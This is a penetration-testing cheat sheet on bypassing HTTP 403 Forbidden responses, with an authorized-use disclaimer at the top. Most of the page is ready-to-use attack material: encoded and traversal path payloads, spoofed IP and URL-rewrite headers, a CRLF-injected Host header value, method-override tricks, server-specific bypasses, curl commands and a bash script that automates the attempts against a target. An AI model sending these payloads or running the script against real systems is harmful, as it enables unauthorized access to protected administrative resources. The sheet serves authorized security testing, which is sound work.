← All cheat sheets

403-BYPASS

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

Methods to bypass HTTP 403 Forbidden responses through header
manipulation, path traversal tricks, method switching, and
protocol-level techniques.

PATH MANIPULATION#

# Case variation
GET /admin                                  # 403
GET /Admin                                  # Try
GET /ADMIN                                  # Try
GET /aDmIn                                  # Try

# Path traversal
GET /admin                                  # 403
GET /./admin                                # Try
GET /admin/.                                # Try
GET //admin                                 # Try
GET /admin/                                 # Try
GET /admin//                                # Try
GET /.//admin                               # Try

# URL encoding
GET /%61dmin                                # 'a' encoded
GET /ad%6din                                # 'm' encoded
GET /%61%64%6d%69%6e                        # Full encode
GET /admin%20                               # Trailing space
GET /admin%09                               # Trailing tab
GET /admin%00                               # Null byte
GET /admin%0a                               # Newline
GET /admin%0d                               # Carriage return

# Double URL encoding
GET /%2561dmin                              # Double-encoded 'a'
GET /%252fadmin                             # Double-encoded '/'

# Unicode / UTF-8 encoding
GET /admi%C0%AEn                            # Overlong UTF-8
GET /%C0%AFadmin                            # Overlong slash
GET /admin%E2%80%8B                         # Zero-width space
GET /admin%EF%BB%BF                         # BOM character

# Path normalization tricks
GET /admin..;/                              # Semicolon
GET /admin;/                                # Semicolon
GET /admin/..;/admin                        # Traversal via semicolon
GET /../admin                               # Parent directory
GET /admin/../admin                         # Self-referencing
GET /./admin/./                             # Dot segments
GET /admin.json                             # Extension tricks
GET /admin.html                             # Extension tricks
GET /admin?                                 # Empty query
GET /admin??                                # Double query
GET /admin#                                 # Fragment
GET /admin/*                                # Wildcard
GET /admin.php                              # Add extension

# Backslash (IIS/Windows)
GET /admin\                                 # Backslash
GET \admin                                  # Leading backslash
GET /admin\.                                # Backslash dot

# Add trailing characters
GET /admin/~                                # Tilde
GET /admin/!                                # Exclamation
GET /admin/.randomstring                    # Dot + random

HEADER MANIPULATION#

# IP-based bypass (pretend to be internal/trusted)
X-Forwarded-For: 127.0.0.1
X-Forwarded-For: localhost
X-Forwarded-For: 10.0.0.1
X-Forwarded-For: 192.168.1.1
X-Forwarded-For: 0.0.0.0
X-Real-IP: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
Cluster-Client-IP: 127.0.0.1
X-Cluster-Client-IP: 127.0.0.1
Forwarded: for=127.0.0.1
Forwarded-For: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
Via: 1.0 localhost
X-Host: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1

# URL rewrite headers
X-Original-URL: /admin
X-Rewrite-URL: /admin
X-Custom-URL: /admin

# Host header tricks
Host: localhost
Host: 127.0.0.1
Host: internal.target.com
Host: target.com:8080
Host: target.com\r\nX-Forwarded-For: 127.0.0.1

# Referer tricks
Referer: https://target.com/admin
Referer: https://localhost/admin

# Content-Type manipulation
Content-Type: application/json
Content-Type: application/xml
Content-Type: application/x-www-form-urlencoded
Content-Type: text/plain

HTTP METHOD SWITCHING#

# Standard methods
GET /admin     → 403
POST /admin    → Try
PUT /admin     → Try
DELETE /admin  → Try
PATCH /admin   → Try
HEAD /admin    → Try
OPTIONS /admin → Try (may reveal allowed methods)
TRACE /admin   → Try (may leak info)
CONNECT /admin → Try

# Method override headers (when server accepts overrides)
X-HTTP-Method: PUT
X-HTTP-Method-Override: PUT
X-Method-Override: PUT

# With override header
GET /admin HTTP/1.1
X-HTTP-Method-Override: POST

PROTOCOL & VERSION TRICKS#

# HTTP version downgrade
GET /admin HTTP/1.0                         # Try HTTP/1.0
GET /admin HTTP/0.9                         # Try HTTP/0.9

# HTTP/2 specific
# Some reverse proxies handle HTTP/2 differently
# Try forcing HTTP/1.1 vs HTTP/2

# HTTPS vs HTTP
# If 403 on HTTPS, try HTTP (or vice versa)
# Different backend handling

TECHNOLOGY-SPECIFIC BYPASSES#

# Apache
GET /admin                                  # 403
GET /admin/                                 # Try
GET /admin/.                                # Try
GET //admin                                 # Try

# Nginx
GET /admin                                  # 403
GET /Admin                                  # Case-sensitive
GET /admin../                               # Path confusion
GET /admin%20/                              # Trailing space

# IIS
GET /admin                                  # 403
GET /admin\                                 # Backslash
GET /admin%20                               # Short filename
GET /admin::$DATA                           # Alternate data stream
GET /admin.aspx                             # Add extension

# Tomcat / Java
GET /admin                                  # 403
GET /admin/..;/admin                        # Semicolon traversal
GET /admin;.css                             # Extension after semicolon
GET /admin;param=value                      # Parameter injection

# Spring Boot
GET /admin                                  # 403
GET /admin.json                             # Suffix pattern
GET /admin/                                 # Trailing slash
GET /admin;jsessionid=x                     # Session param

# Node.js / Express
GET /admin                                  # 403
GET /Admin                                  # Case variation
GET /admin%2f                               # Encoded slash

CURL TESTING#

# Quick 403 bypass testing

# Path tricks
curl -s -o /dev/null -w "%{http_code}" https://target.com/admin
curl -s -o /dev/null -w "%{http_code}" https://target.com/Admin
curl -s -o /dev/null -w "%{http_code}" https://target.com/admin/
curl -s -o /dev/null -w "%{http_code}" https://target.com//admin
curl -s -o /dev/null -w "%{http_code}" https://target.com/./admin
curl -s -o /dev/null -w "%{http_code}" https://target.com/admin..;/

# Header tricks
curl -s -o /dev/null -w "%{http_code}" -H "X-Forwarded-For: 127.0.0.1" https://target.com/admin
curl -s -o /dev/null -w "%{http_code}" -H "X-Original-URL: /admin" https://target.com/
curl -s -o /dev/null -w "%{http_code}" -H "X-Rewrite-URL: /admin" https://target.com/

# Method switching
curl -s -o /dev/null -w "%{http_code}" -X POST https://target.com/admin
curl -s -o /dev/null -w "%{http_code}" -X PUT https://target.com/admin
curl -s -o /dev/null -w "%{http_code}" -X OPTIONS https://target.com/admin

AUTOMATED TOOLS#

# 403bypasser
python3 403bypasser.py -u https://target.com/admin

# bypass-403 (Go)
go install github.com/iamj0ker/bypass-403@latest
bypass-403 https://target.com/admin

# dirsearch with 403 bypass
dirsearch -u https://target.com -w wordlist.txt --header "X-Forwarded-For: 127.0.0.1"

# Burp extensions
# 403 Bypasser (BApp Store)
# Bypass WAF (BApp Store)

BASH AUTOMATION SCRIPT#

#!/bin/bash
URL="$1"
echo "[*] Testing 403 bypass for: $URL"

# Path variations
for path in "/" "/." "//" "%20" "%09" "..;/" ";/" "?" "#"; do
    code=$(curl -s -o /dev/null -w "%{http_code}" "${URL}${path}")
    echo "  ${URL}${path} → $code"
done

# Header bypass
for header in "X-Forwarded-For: 127.0.0.1" "X-Original-URL: ${URL##*/}" "X-Rewrite-URL: ${URL##*/}"; do
    code=$(curl -s -o /dev/null -w "%{http_code}" -H "$header" "$URL")
    echo "  Header: $header → $code"
done

# Method bypass
for method in POST PUT PATCH DELETE OPTIONS TRACE; do
    code=$(curl -s -o /dev/null -w "%{http_code}" -X "$method" "$URL")
    echo "  Method: $method → $code"
done

TIPS#

  - Try multiple techniques in combination (header + path)
  - X-Original-URL and X-Rewrite-URL work on some reverse proxies
  - Semicolon tricks are highly effective against Tomcat/Java
  - Always try both with and without trailing slash
  - Case sensitivity matters on Linux servers (not Windows/IIS)
  - Check OPTIONS response for allowed methods
  - Method override headers bypass frontend but hit backend
  - URL encoding tricks exploit parser differentials
  - Double encoding catches intermediate proxy decoding
  - Test both HTTP/1.0 and HTTP/1.1
  - Not all 403s are bypassable; some are legitimate ACLs
  - Document bypass method for reproducibility in reports